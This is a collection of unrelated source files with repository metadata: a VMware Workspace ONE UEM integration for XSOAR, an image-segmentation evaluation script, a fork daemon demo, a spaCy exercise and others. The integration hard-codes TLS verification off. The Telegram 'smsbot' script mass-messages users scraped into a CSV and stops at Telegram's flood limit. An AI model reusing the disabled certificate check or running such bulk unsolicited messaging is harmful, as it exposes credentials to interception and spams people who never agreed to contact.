"MAC_ADDR": "MAC Address",
"COMPLIANCE_STATUS": "Compliance Status",
"USER_EMAIL": "User Email Address",
"LAST_SEEN": "Last Seen (In UTC)"
}
''' CLIENT CLASS '''
class Client(BaseClient):
"""Client class to interact with the service API
This Client implements API calls, and does not contain any XSOAR logic.
Should only do requests and return data.
It inherits from BaseClient defined in CommonServer Python.
Most calls use _http_request() that handles proxy, SSL verification, etc.
For this implementation, no special attributes defined
"""
def __init__(self, username, password, base_url, headers, verify=True, proxy=False):
"""
Store username and password for authentication.
:type username: ``string``
:param username: username of salesforce account
:type password: ``string``
:param password: password of salesforce account
:type base_url: ``string``
:param base_url: service API url.
:type headers: ``dict``
:param headers: The request headers, for example: {'Accept`: `application/json`}.
:type verify: ``bool``
:param verify: SSL verification is handled out of the box.
:type proxy: ``bool``
:param proxy: system proxy is handled out of the box.
"""
super().__init__(base_url=base_url, auth=(username, password), headers=headers, verify=verify, proxy=proxy)
def http_request(self, *args, **kwargs) -> requests.Response:
"""
Overrides the _http_request method of base class and authenticate using bearer token generated from
session id which is cached in IntegrationContext
"""
kwargs['ok_codes'] = (200, 201, 204)
kwargs['error_handler'] = self.exception_handler
kwargs['resp_type'] = 'response'
return super()._http_request(*args, **kwargs)
@staticmethod
def exception_handler(response: requests.models.Response):
"""
Handle error in the response and display error message based on status code.
:type response: ``requests.models.Response``
:param response: response from API.
:raises: raise DemistoException based on status code of response.
"""
err_msg = ""
if response.status_code in HTTP_ERROR:
if response.status_code in [401, 403]:
demisto.error(f"{LOGGING_INTEGRATION_NAME} {response.json()}")
err_msg = HTTP_ERROR[response.status_code]
elif response.status_code > 500:
err_msg = HTTP_ERROR[500]
elif response.status_code not in HTTP_ERROR:
err_msg = 'Error in API call [{}] - {}' \
.format(response.status_code, response.reason)
headers = response.headers
if 'application/json' in headers.get('Content-Type', ''):
error_entry = response.json()
if error_entry.get('message'):
err_msg = '{}'.format(error_entry.get('message'))
raise DemistoException(err_msg)
''' HELPER FUNCTIONS '''
def remove_empty_elements_for_context(src):
"""
Recursively remove empty lists, empty dicts, empty string or None elements from a dictionary.
:type src: ``dict``
:param src: Input dictionary.
:return: Dictionary with all empty lists,empty string and empty dictionaries removed.
:rtype: ``dict``
"""
def empty(x):
return x is None or x == '' or x == {} or x == []
if not isinstance(src, (dict, list)):
return src
elif isinstance(src, list):
return [v for v in (remove_empty_elements_for_context(v) for v in src) if not empty(v)]
else:
return {k: v for k, v in ((k, remove_empty_elements_for_context(v))
for k, v in src.items()) if not empty(v)}
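# A rough illustration of the recursion above (hypothetical input):
# remove_empty_elements_for_context({"a": "", "b": {"c": None}, "d": [1]}) returns {"d": [1]}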
def validate_uuid_argument(args: dict) -> str:
"""
To validate argument uuid.
:type args: ``dict``
:param args: dictionary returned by demisto.args
:return: validated arguments.
:rtype: ``str``
"""
if not args.get('uuid'):
raise ValueError(MESSAGES['REQUIRED_ARGUMENT'].format("uuid"))
return args.get('uuid') # type: ignore
def camel_to_pascal(src: dict) -> dict:
"""
Convert the keys of a nested dictionary and list from camel case to pascal case.
:type src: ``dict``
:param src: the dictionary whose keys require change in case
:return: a dictionary with the keys changed from camel case to pascal case
"""
if not isinstance(src, (dict, list)):
return src
return_src = {}
def capitalize_first_letter(string: str) -> str:
"""
Capitalize only the first letter of a string
:param string: string whose first letter needs to be capitalized
:return: string with first letter capitalized
"""
return string[0].upper() + string[1:]
if isinstance(src, list):
return_src = [camel_to_pascal(obj) for obj in src]
return return_src
for key, value in src.items():
if isinstance(value, (dict, list)):
return_src[capitalize_first_letter(key)] = camel_to_pascal(value) # type: ignore
else:
return_src[capitalize_first_letter(key)] = value
return return_src
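# A rough illustration (hypothetical input): camel_to_pascal({"friendlyName": "x", "platformInfo": {"modelName": "y"}})
# returns {"FriendlyName": "x", "PlatformInfo": {"ModelName": "y"}}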
def prepare_context_hr_os_updates_list_command(result: dict, uuid: str) -> Tuple[Union[dict, List[dict]], str]:
"""
To prepare context and human readable output for vmwuem_device_os_updates_list_command.
:type result: ``dict``
:param result: dictionary returned by api response of vmwuem_device_os_updates_list_command.
:type uuid: ``str``
:param uuid: argument of vmwuem_device_os_updates_list_command.
:return: Context and human readable output.
:rtype: ``Tuple[Dict, str]``
"""
result = remove_empty_elements_for_context(result) # type: ignore
result['OSUpdateList'] = camel_to_pascal(result['OSUpdateList'])
result['Uuid'] = uuid.lower()
context_data = result
hr = []
for osupdate in result['OSUpdateList']:
release_date = osupdate.get('ReleaseDate', '')
expiration_date = osupdate.get('ExpiationDate', '')
if release_date:
release_date = dateparser.parse(release_date).strftime(READABLE_DATE_FORMAT) # type: ignore
if expiration_date:
expiration_date = dateparser.parse(expiration_date).strftime(READABLE_DATE_FORMAT) # type: ignore
data = {
'Device UUID': result['Uuid'],
'Update Name': osupdate.get('DeviceUpdateName', ''),
'Update Version': osupdate.get('DeviceUpdateVersion', ''),
'Critical Update': "Yes" if osupdate.get('IsCritical', False) else "No",
'Restart Required': "Yes" if osupdate.get('RestartRequired', False) else "No",
'Release Date': release_date,
'Expiration Date': expiration_date
}
hr.append(data)
headers = ['Device UUID', 'Update Name', 'Update Version', 'Critical Update', 'Restart Required',
'Release Date', 'Expiration Date']
hr_output = tableToMarkdown('OSUpdate(s)', hr, headers=headers, removeNull=True)
return context_data, hr_output
def strip_args(args: dict):
"""
Strips argument dictionary values of spaces
:type args: dict
:param args: argument dictionary
"""
for key, value in args.items():
if isinstance(value, str):
args[key] = value.strip()
def is_present_in_list(value_to_check: Any, list_to_check_in: List[Any], message: str) -> Optional[bool]:
"""
Checks for presence of value in list, raises ValueError, if the value is not present
:type value_to_check: ``Any``
:param value_to_check: value to check presence of
:type list_to_check_in: ``List[Any]``
:param list_to_check_in: list to check the presence of value
:type message: ``str``
:param message: message with which the ValueError will be raised with
:rtype: ``bool``
:returns: True, if the value is present
"""
if value_to_check not in list_to_check_in:
raise ValueError(message)
return True
def prepare_context_and_hr_for_devices_search(response: dict) -> Tuple[Union[dict, List[dict]], str]:
"""
Prepare entry context and human readable for devices search command
:type response: ``dict``
:param response: dictionary json response from search api
:rtype: ``Tuple[list, str]``
:return: tuple of dict entry context and str human readable
"""
context = response.get('Devices', [])
hr_devices_list = []
for device in context:
last_seen = device.get('LastSeen', '')
if last_seen:
last_seen = dateparser.parse(last_seen).strftime(READABLE_DATE_FORMAT) # type: ignore
compromised = device.get('CompromisedStatus', '')
if isinstance(compromised, str):
compromised = "Unknown"
else:
compromised = "Compromised" if compromised else "Not Compromised"
ownership = device.get('Ownership', '')
if ownership in REVERSED_ARG_TO_PARAM_OWNERSHIP.keys():
ownership = REVERSED_ARG_TO_PARAM_OWNERSHIP[ownership]
else:
ownership = ''
hr_devices_list.append({
CONSTANT_STRING['DEVICE_FRIENDLY']: device.get(CONSTANT_STRING['DEVICE_FRIENDLY'].replace(' ', ''), ''),
"UUID": device.get('Uuid', ''),
"Platform": device.get('Platform', ''),
"Model": device.get('Model', ''),
"Ownership": ownership,
CONSTANT_STRING["SERIAL_NUM"]: device.get(CONSTANT_STRING["SERIAL_NUM"].replace(' ', ''), ''),
CONSTANT_STRING["MAC_ADDR"]: device.get('MacAddress', ''),
CONSTANT_STRING["COMPLIANCE_STATUS"]: device.get('ComplianceStatus', ''),
"Compromised Status": compromised,
CONSTANT_STRING["USER_EMAIL"]: device.get('UserEmailAddress', ''),
CONSTANT_STRING["LAST_SEEN"]: last_seen
})
hr = tableToMarkdown("Device(s)", hr_devices_list,
[CONSTANT_STRING['DEVICE_FRIENDLY'], "UUID", "Platform", "Model", "Ownership",
CONSTANT_STRING["SERIAL_NUM"],
CONSTANT_STRING["MAC_ADDR"], CONSTANT_STRING["COMPLIANCE_STATUS"], "Compromised Status",
CONSTANT_STRING["USER_EMAIL"],
CONSTANT_STRING["LAST_SEEN"]],
removeNull=True)
return remove_empty_elements_for_context(context), hr
def validate_and_parameterize_devices_search_arguments(args: dict) -> dict:
"""
Convert arguments to parameter for command vmwuem-devices-search command, raise ValueError with
appropriate message
:type args: ``dict``
:param args: dictionary returned by demisto.args()
:rtype: ``dict``
:return: dictionary parameters for http request
"""
params = {
"user": args.get("user"),
"model": args.get("model"),
"platform": args.get("platform"),
"lgid": args.get("lgid"),
"orderby": args.get("order_by"),
}
params = remove_empty_elements(params)
if args.get("ownership"):
ownership = args.get("ownership", '').lower() # type: ignore
is_present_in_list(ownership, list(ARG_TO_PARAM_OWNERSHIP.keys()), MESSAGES['INVALID_OWNERSHIP'])
params['ownership'] = ARG_TO_PARAM_OWNERSHIP[ownership]
# Validate date-time params
if args.get("last_seen"):
params['lastseen'] = arg_to_datetime(args.get("last_seen"), "last_seen").strftime(DATE_FORMAT) # type: ignore
# Validate paging and sorting params
if args.get("page_size"):
page_size = arg_to_number(args.get("page_size", "10"), "page_size")
if page_size < 1: # type: ignore
raise ValueError(MESSAGES['INVALID_PAGE_SIZE'])
params['pagesize'] = page_size
if args.get("page"):
page = arg_to_number(args.get("page"), "page")
if page < 0: # type: ignore
raise ValueError(MESSAGES['INVALID_PAGE'])
params['page'] = page
if args.get("sort_order"):
sort_order = args.get("sort_order").upper() # type: ignore
is_present_in_list(sort_order, ["ASC", "DESC"], MESSAGES['INVALID_SORT_ORDER'])
params['sortorder'] = sort_order
return params
def prepare_context_and_hr_for_devices_get(response: dict) -> Tuple[dict, str]:
"""
Prepare entry context and human readable for device get command
:type response: ``dict``
:param response: dictionary json response from get api
:rtype: ``Tuple[dict, str]``
:return: tuple of dict entry context and str human readable
"""
enrollment_info = response.get('enrollmentInfo', {})
compliance = enrollment_info.get('compliant', '')
if isinstance(compliance, str):
compliance = "Unknown"
else:
compliance = "Compliant" if compliance else "Non-Compliant"
last_seen = enrollment_info.get('lastSeenTimestamp', '')
if last_seen:
last_seen = dateparser.parse(last_seen).strftime(READABLE_DATE_FORMAT) # type: ignore
hr_dict = {
CONSTANT_STRING["DEVICE_FRIENDLY"]: response.get('friendlyName', ''),
"UUID": response.get('uuid', ''),
"Platform": response.get('platformInfo', {}).get('platformName', ''),
"Model": response.get('platformInfo', {}).get('modelName'),
"Ownership": enrollment_info.get('ownership', ''),
CONSTANT_STRING["SERIAL_NUM"]: response.get('serialNumber', ''),
CONSTANT_STRING["MAC_ADDR"]: response.get('macAddress', ''),
CONSTANT_STRING["COMPLIANCE_STATUS"]: compliance,
CONSTANT_STRING["USER_EMAIL"]: enrollment_info.get('userEmailAddress', ''),
CONSTANT_STRING["LAST_SEEN"]: last_seen
}
hr = tableToMarkdown("Device", hr_dict,
[CONSTANT_STRING["DEVICE_FRIENDLY"], "UUID", "Platform", "Model", "Ownership",
CONSTANT_STRING["SERIAL_NUM"],
CONSTANT_STRING["MAC_ADDR"], CONSTANT_STRING["COMPLIANCE_STATUS"],
CONSTANT_STRING["USER_EMAIL"], CONSTANT_STRING["LAST_SEEN"]],
removeNull=True)
return remove_empty_elements_for_context(camel_to_pascal(response)), hr
''' COMMAND FUNCTIONS '''
def test_module(client: Client) -> str:
"""Tests API connectivity and authentication'
Returning 'ok' indicates that the integration works like it is supposed to.
Connection to the service is successful.
Raises exceptions if something goes wrong.
:type client: ``Client``
:param client: client to use
:return: 'ok' if test passed, anything else will fail the test.
:rtype: ``str``
"""
client.http_request(method='GET', url_suffix='devices/search')
return 'ok'
def vmwuem_devices_search_command(client: Client, args: dict) -> CommandResults:
"""
Searches devices using the search API according to the arguments
:type client: ``Client``
:param client: client to use
:type args: ``dict``
:param args: arguments from demisto.args
:return: Command results containing the outputs and context.
:rtype: ``CommandResults``
"""
# Prepare parameters for request
args = remove_empty_elements(args)
params = validate_and_parameterize_devices_search_arguments(args)
# Make the call.
response = client.http_request(method='GET', url_suffix='devices/search', params=params)
if not response.text:
return CommandResults(readable_output=MESSAGES['NO_RECORDS_FOUND'].format('device'))
# Prepare context and human readable
json_response = response.json()
outputs, readable_output = prepare_context_and_hr_for_devices_search(json_response)
return CommandResults(outputs_prefix='VMwareWorkspaceONEUEM.Device', outputs_key_field="Uuid", outputs=outputs,
readable_output=readable_output, raw_response=json_response)
def vmwuem_device_get_command(client: Client, args: Dict) -> CommandResults:
"""
Retrieves a device using get device endpoint according to given uuid.
:type client: ``Client``
:param client: client to use
:type args: ``dict``
:param args: dictionary returned by demisto.args
:return: configured command result object containing the outputs and hr.
:rtype: ``CommandResults``
"""
# Validate uuid argument.
uuid = validate_uuid_argument(args)
response = client.http_request(method='GET', url_suffix=f'devices/{uuid}')
# Prepare context and human readable
json_response = response.json()
outputs, readable_output = prepare_context_and_hr_for_devices_get(json_response)
return CommandResults(outputs_prefix='VMwareWorkspaceONEUEM.Device', outputs_key_field="Uuid", outputs=outputs,
readable_output=readable_output, raw_response=json_response)
def vmwuem_device_os_updates_list_command(client: Client, args: dict) -> CommandResults:
"""
Retrieves a list of all available OS and software updates for the specified device.
:type client: ``Client``
:param client: client to use
:type args: ``dict``
:param args: dictionary returned by demisto.args
:return: configured command result object containing the outputs and hr.
:rtype: ``CommandResults``
"""
# validating arguments
uuid = validate_uuid_argument(args)
response = client.http_request(method='GET', url_suffix=f'devices/{uuid}/osupdate')
result = response.json()
if not result.get('OSUpdateList', []):
return CommandResults(readable_output=MESSAGES['NO_RECORDS_FOUND'].format("osupdate(s)"))
# prepare context and human readable
context_data, hr_output = prepare_context_hr_os_updates_list_command(result, uuid)
return CommandResults(
outputs_prefix='VMwareWorkspaceONEUEM.OSUpdate',
outputs_key_field='Uuid',
outputs=context_data,
readable_output=hr_output,
raw_response=result
)
''' MAIN FUNCTION '''
def main() -> None:
"""
main function, parses params and runs command functions
"""
dict_param = demisto.params()
dict_args = demisto.args()
strip_args(dict_args)
command = demisto.command()
# get the username and password for authentication
username = dict_param.get('credentials')['identifier'].strip()
password = dict_param.get('credentials')['password']
api_key = dict_param['aw_tenant_code']
# get the service API url
base_url = urljoin(dict_param['url'], '/API/mdm/')
verify_certificate = False
proxy = dict_param.get('proxy', False)
demisto.debug(f'{LOGGING_INTEGRATION_NAME} Command being called is {command}')
try:
headers: Dict = {"aw-tenant-code": "{}".format(api_key),
"Accept": "application/json;version={}".format(API_VERSION)}
client = Client(
base_url=base_url,
verify=verify_certificate,
headers=headers,
proxy=proxy,
username=username,
password=password
)
commands = {
'vmwuem-devices-search': vmwuem_devices_search_command,
'vmwuem-device-get': vmwuem_device_get_command,
'vmwuem-device-os-updates-list': vmwuem_device_os_updates_list_command
}
if command == 'test-module':
# This is the call made when pressing the integration Test button.
return_results(test_module(client))
elif command in commands:
return_results(commands[command](client, dict_args))
# Log exceptions and return errors
except Exception as e:
demisto.error(traceback.format_exc()) # print the traceback
return_error(f'Failed to execute {demisto.command()} command.\nError:\n{str(e)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 37.180301 | 118 | 0.654932 |
4521a736d606c08fd30161ae6f150ff1deee4a2a
| 270 |
py
|
Python
|
9.3.py
|
RonaldZhao/NowCoder
|
935af39835a98efc14157e20df1e3458e02b9803
|
[
"MIT"
] | null | null | null |
9.3.py
|
RonaldZhao/NowCoder
|
935af39835a98efc14157e20df1e3458e02b9803
|
[
"MIT"
] | null | null | null |
9.3.py
|
RonaldZhao/NowCoder
|
935af39835a98efc14157e20df1e3458e02b9803
|
[
"MIT"
] | null | null | null |
class StandInLine:
def getWays(self, n, a, b):
if n <= 1:
return [0, 0]
a1, a2 = 1, 1
if n > 2:
for i in range(1, n + 1):
a1 *= i
a1 /= 2
a2 = a1 * 2 / n
return [a1, a2]
| 22.5 | 37 | 0.337037 |
18e559d014db29138b4a757f61fd1f6fd6722f0e
| 5,818 |
py
|
Python
|
research/cv/Auto-DeepLab/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/Auto-DeepLab/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/Auto-DeepLab/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Evaluate mIOU and Pixel accuracy"""
import os
import argparse
import ast
import cv2
from PIL import Image
import numpy as np
from src.utils.utils import fast_hist
from build_mindrecord import encode_segmap
def decode_segmap(pred):
"""decode_segmap"""
mask = np.uint8(pred)
num_classes = 19
valid_classes = [7, 8, 11, 12, 13, 17, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 31, 32, 33]
rank_classes = range(num_classes)
class_map = dict(zip(rank_classes, valid_classes))
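    # e.g. train rank 0 maps back to Cityscapes labelId 7 (road) and rank 18 to labelId 33 (bicycle)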
for _rank in rank_classes:
mask[mask == _rank] = class_map[_rank]
return mask
def get_color(npimg):
"""get_color"""
cityspallete = [
128, 64, 128,
244, 35, 232,
70, 70, 70,
102, 102, 156,
190, 153, 153,
153, 153, 153,
250, 170, 30,
220, 220, 0,
107, 142, 35,
152, 251, 152,
0, 130, 180,
220, 20, 60,
255, 0, 0,
0, 0, 142,
0, 0, 70,
0, 60, 100,
0, 80, 100,
0, 0, 230,
119, 11, 32,
]
img = Image.fromarray(npimg.astype('uint8'), "P")
img.putpalette(cityspallete)
out_img = np.array(img.convert('RGB'))
return out_img
def infer(args):
"""infer"""
images_base = os.path.join(args.dataset_path, 'leftImg8bit/val')
annotations_base = os.path.join(args.dataset_path, 'gtFine/val')
hist = np.zeros((args.num_classes, args.num_classes))
for root, _, files in os.walk(images_base):
for filename in files:
if filename.endswith('.png'):
print("start infer ", filename)
file_name = filename.split('.')[0]
prob_file = os.path.join(args.result_path, file_name + "_0.bin")
flipped_prob_file = os.path.join(args.result_path, file_name + "_flip_0.bin")
prob = np.fromfile(prob_file, dtype=np.float32)
prob = prob.reshape(1, 19, 1024, 2048)
flipped_prob = np.fromfile(flipped_prob_file, dtype=np.float32).reshape(1, 19, 1024, 2048)
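                # Test-time flip augmentation: the logits predicted for the horizontally flipped
                # input are flipped back along the width axis before being summed with the originals.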
pred = (prob + flipped_prob[:, :, :, ::-1])
pred = pred.argmax(1).astype(np.uint8)
folder_name = root.split(os.sep)[-1]
if args.cal_acc:
gtFine_name = filename.replace('leftImg8bit', 'gtFine_labelIds')
label_file = os.path.join(annotations_base, folder_name, gtFine_name)
label = np.array(cv2.imread(label_file, cv2.IMREAD_GRAYSCALE), np.uint8)
label = encode_segmap(label, 255)
hist = hist + fast_hist(pred.copy().flatten(), label.flatten(), args.num_classes)
if args.save_img:
# labelIds image
predImg_name = filename.replace('leftImg8bit', 'predImg_labelIds')
predImg_root = os.path.join(args.output_path, folder_name)
predImg_file = os.path.join(predImg_root, predImg_name)
if not os.path.isdir(predImg_root):
os.makedirs(predImg_root)
decode_pred = decode_segmap(pred.copy().squeeze(0))
cv2.imwrite(predImg_file, decode_pred, [cv2.IMWRITE_PNG_COMPRESSION])
# colorful segmentation image
colorImg_name = filename.replace('leftImg8bit', 'predImg_colorful')
colorImg_root = args.output_path
colorImg_root = os.path.join(colorImg_root.replace('output', 'output_img'), folder_name)
colorImg_file = os.path.join(colorImg_root, colorImg_name)
if not os.path.isdir(colorImg_root):
os.makedirs(colorImg_root)
color_pred = get_color(pred.copy().squeeze(0))
color_pred = cv2.cvtColor(np.asarray(color_pred), cv2.COLOR_RGB2BGR)
cv2.imwrite(colorImg_file, color_pred, [cv2.IMWRITE_PNG_COMPRESSION])
if args.cal_acc:
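        # Per-class IoU from the confusion matrix: diag(hist) holds the true positives and
        # hist.sum(0) + hist.sum(1) - diag(hist) equals TP + FP + FN; mIOU averages over classes.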
miou = np.diag(hist) / (hist.sum(0) + hist.sum(1) - np.diag(hist) + 1e-10)
miou = round(np.nanmean(miou) * 100, 2)
print("mIOU = ", miou, "%")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Auto-DeepLab Inference post-process")
parser.add_argument("--dataset_path", type=str, default="", help="dataset path for evaluation")
parser.add_argument("--num_classes", type=int, default=19)
parser.add_argument("--device_id", type=int, default=0, help="Device id, default: 0.")
parser.add_argument("--result_path", type=str, default="", help="Prob bin file path.")
parser.add_argument("--output_path", type=str, default="", help="Output path.")
parser.add_argument("--save_img", type=ast.literal_eval, default=True, help="Whether save pics after inference.")
parser.add_argument("--cal_acc", type=ast.literal_eval, default=True, help="Calculate mIOU or not.")
Args = parser.parse_args()
infer(Args)
| 42.15942 | 118 | 0.588175 |
7a073bef29cb1ccbf97f4c94c853d1f67572392e
| 3,247 |
py
|
Python
|
TeleGram-Scraper-master/smsbot.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
TeleGram-Scraper-master/smsbot.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
TeleGram-Scraper-master/smsbot.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
#!/bin/env python3
from telethon.sync import TelegramClient
from telethon.tl.types import InputPeerUser
from telethon.errors.rpcerrorlist import PeerFloodError
import configparser
import os, sys
import csv
import random
import time
re="\033[1;31m"
gr="\033[1;32m"
cy="\033[1;36m"
SLEEP_TIME = 30
class main():
def banner():
print(f"""
{re}╔╦╗{cy}┌─┐┬ ┌─┐{re}╔═╗ ╔═╗{cy}┌─┐┬─┐┌─┐┌─┐┌─┐┬─┐
{re} ║ {cy}├┤ │ ├┤ {re}║ ╦ ╚═╗{cy}│ ├┬┘├─┤├─┘├┤ ├┬┘
{re} ╩ {cy}└─┘┴─┘└─┘{re}╚═╝ ╚═╝{cy}└─┘┴└─┴ ┴┴ └─┘┴└─
version : 3.1
youtube.com/theunknon
""")
def send_sms():
try:
cpass = configparser.RawConfigParser()
cpass.read('config.data')
api_id = cpass['cred']['id']
api_hash = cpass['cred']['hash']
phone = cpass['cred']['phone']
except KeyError:
os.system('clear')
main.banner()
print(re+"[!] run python3 setup.py first !!\n")
sys.exit(1)
client = TelegramClient(phone, api_id, api_hash)
client.connect()
if not client.is_user_authorized():
client.send_code_request(phone)
os.system('clear')
main.banner()
client.sign_in(phone, input(gr+'[+] Enter the code: '+re))
os.system('clear')
main.banner()
input_file = sys.argv[1]
users = []
with open(input_file, encoding='UTF-8') as f:
rows = csv.reader(f,delimiter=",",lineterminator="\n")
next(rows, None)
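            # Expected CSV columns, per the indices used below: username, user id, access hash, display name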
for row in rows:
user = {}
user['username'] = row[0]
user['id'] = int(row[1])
user['access_hash'] = int(row[2])
user['name'] = row[3]
users.append(user)
print(gr+"[1] send sms by user ID\n[2] send sms by username ")
mode = int(input(gr+"Input : "+re))
message = input(gr+"[+] Enter Your Message : "+re)
for user in users:
if mode == 2:
if user['username'] == "":
continue
receiver = client.get_input_entity(user['username'])
elif mode == 1:
receiver = InputPeerUser(user['id'],user['access_hash'])
else:
print(re+"[!] Invalid Mode. Exiting.")
client.disconnect()
sys.exit()
try:
print(gr+"[+] Sending Message to:", user['name'])
client.send_message(receiver, message.format(user['name']))
print(gr+"[+] Waiting {} seconds".format(SLEEP_TIME))
time.sleep(SLEEP_TIME)
except PeerFloodError:
print(re+"[!] Getting Flood Error from telegram. \n[!] Script is stopping now. \n[!] Please try again after some time.")
client.disconnect()
sys.exit()
except Exception as e:
print(re+"[!] Error:", e)
print(re+"[!] Trying to continue...")
continue
client.disconnect()
print("Done. Message sent to all users.")
main.send_sms()
| 32.47 | 136 | 0.483523 |
833476dc810de79fadb03a8f9dfae5f6eae658e1
| 1,256 |
py
|
Python
|
exercises/es/exc_03_12.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/es/exc_03_12.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/es/exc_03_12.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
import json
from spacy.lang.es import Spanish
from spacy.tokens import Span
from spacy.matcher import PhraseMatcher
with open("exercises/es/countries.json", encoding="utf8") as f:
COUNTRIES = json.loads(f.read())
with open("exercises/es/capitals.json", encoding="utf8") as f:
CAPITALS = json.loads(f.read())
nlp = Spanish()
matcher = PhraseMatcher(nlp.vocab)
matcher.add("COUNTRY", None, *list(nlp.pipe(COUNTRIES)))
def countries_component(doc):
    # Create a Span of entities with the label "LOC" for all of the matches
matches = matcher(doc)
doc.ents = [____(____, ____, ____, label=____) for match_id, start, end in matches]
return doc
# Add the component to the pipeline
____.____(____)
print(nlp.pipe_names)
# The getter that looks up the span text in a dictionary of countries' capital cities
get_capital = lambda span: CAPITALS.get(span.text)
# Register the Span attribute extension, "capital", with the getter get_capital
____.____(____, ____)
# Process the text and print the entity text, the label and the "capital" attributes
doc = nlp(
"La República Checa podría ayudar a la República Eslovaca "
"a proteger su espacio aéreo"
)
print([(____, ____, ____) for ent in doc.ents])
| 29.209302 | 87 | 0.730892 |
369361e8d9c9c019690280f0b36bcfd3b0fe8096
| 1,268 |
py
|
Python
|
python/fork.py
|
immortal/sandbox
|
761645c11399b15f624104accdf39688faf96a04
|
[
"BSD-3-Clause"
] | null | null | null |
python/fork.py
|
immortal/sandbox
|
761645c11399b15f624104accdf39688faf96a04
|
[
"BSD-3-Clause"
] | 1 |
2020-06-25T03:59:50.000Z
|
2020-06-25T03:59:50.000Z
|
python/fork.py
|
immortal/sandbox
|
761645c11399b15f624104accdf39688faf96a04
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
import os
import sys
def main():
""" A demo daemon main routine, write a datestamp to
/tmp/daemon-log every 10 seconds.
"""
import time
f = open("/tmp/daemon-log", "w")
while 1:
f.write('%s\n' % time.ctime(time.time()))
f.flush()
time.sleep(10)
if __name__ == "__main__":
# do the UNIX double-fork magic, see Stevens' "Advanced
# Programming in the UNIX Environment" for details (ISBN 0201563177)
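    # In short: the first fork lets the original parent exit so the child can call setsid()
    # and detach from the controlling terminal; the second fork ensures the daemon is no
    # longer a session leader and therefore cannot reacquire a controlling terminal.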
try:
pid = os.fork()
if pid > 0:
print "going to exit pid: %d" % pid
# exit first parent
sys.exit(0)
except OSError, e:
print >>sys.stderr, "fork #1 failed: %d (%s)" % (e.errno, e.strerror)
sys.exit(1)
print "second start pid: %d" % os.getpid()
# decouple from parent environment
os.chdir("/")
os.setsid()
os.umask(0)
# do second fork
try:
pid = os.fork()
if pid > 0:
# exit from second parent, print eventual PID before
print "Daemon PID %d" % pid
sys.exit(0)
except OSError, e:
print >>sys.stderr, "fork #2 failed: %d (%s)" % (e.errno, e.strerror)
sys.exit(1)
# start the daemon main loop
main()
| 25.36 | 77 | 0.544953 |
7fea5d689efce097a541b6dfb58072f4b35ca691
| 327 |
py
|
Python
|
1_Datentypen/03_tuples/_01_unpack_and_move_in.py
|
DavidStahl97/Python-Grundkurs
|
6796d19116d2f838b193b106d00bc2e74a8cdcb4
|
[
"MIT"
] | null | null | null |
1_Datentypen/03_tuples/_01_unpack_and_move_in.py
|
DavidStahl97/Python-Grundkurs
|
6796d19116d2f838b193b106d00bc2e74a8cdcb4
|
[
"MIT"
] | null | null | null |
1_Datentypen/03_tuples/_01_unpack_and_move_in.py
|
DavidStahl97/Python-Grundkurs
|
6796d19116d2f838b193b106d00bc2e74a8cdcb4
|
[
"MIT"
] | null | null | null |
# tuples are defined as:
# create a tuple, grab a value.
# show them
# can also assign on a single line:
# Concrete example with a date
# You'll find this often in loops (remember numerical for-in loops):
# Immutable does not necessarily mean the contents are unchangeable
## A reference to a list (the list itself can still be modified internally)
| 13.625 | 68 | 0.724771 |
43fda1474c164b8c211acc5573e242ad8ee11c88
| 33,499 |
py
|
Python
|
FuncionesSQL.py
|
Miguel-331/Proyecto-SUN
|
104afd03e05616a297fbda976d377f49a1f905ec
|
[
"Unlicense"
] | null | null | null |
FuncionesSQL.py
|
Miguel-331/Proyecto-SUN
|
104afd03e05616a297fbda976d377f49a1f905ec
|
[
"Unlicense"
] | null | null | null |
FuncionesSQL.py
|
Miguel-331/Proyecto-SUN
|
104afd03e05616a297fbda976d377f49a1f905ec
|
[
"Unlicense"
] | null | null | null |
import Graficador as graficar
import os
import FuncionesGraficas as graficos
# This function adds students to the database
def AñadirEstudiante(lector,database):
graficar.Simple()
while True:
try:
a = input("Digite el nombre del nuevo estudiante: ")
b = input("Digite el apellido del nuevo estudiante: ")
c = input("Digite el ID del nuevo estudiante: ")
